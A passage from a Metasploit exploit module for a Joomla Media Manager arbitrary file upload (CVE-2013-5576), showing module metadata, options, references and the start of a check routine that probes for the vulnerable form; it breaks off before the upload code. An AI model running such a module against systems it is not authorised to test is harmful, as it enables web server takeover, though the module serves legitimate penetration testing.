## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Joomla Media Manager File Upload Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component, which comes by default in Joomla, allowing arbitrary file uploads, and results in arbitrary code execution. The module has been tested successfully on Joomla 2.5.13 and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media Manager, you will need to supply a valid username and password (Editor role or higher) in order to work properly. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-5576' ], [ 'OSVDB', '95933' ], [ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ], [ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ], [ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ], [ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ], [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/08/15/time-to-patch-joomla' ] ], 'Payload' => { 'DisableNops' => true, # Arbitrary big number. The payload gets sent as POST data, so # really it's unlimited 'Space' => 262144, # 256k }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Joomla 2.5.x <=2.5.13 / Joomla 3.x <=3.1.4', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 01 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']), OptString.new('USERNAME', [false, 'User to login with', '']), OptString.new('PASSWORD', [false, 'Password to login with', '']), ], self.class) end def check res = get_upload_form if res and (res.code == 200 or res.code == 302) if res.body =~ /You are not authorised to view this resource/ print_status("#{peer} - Joomla Media Manager Found but authentication required") return Exploit::CheckCode::Detected elsif res.body =~ /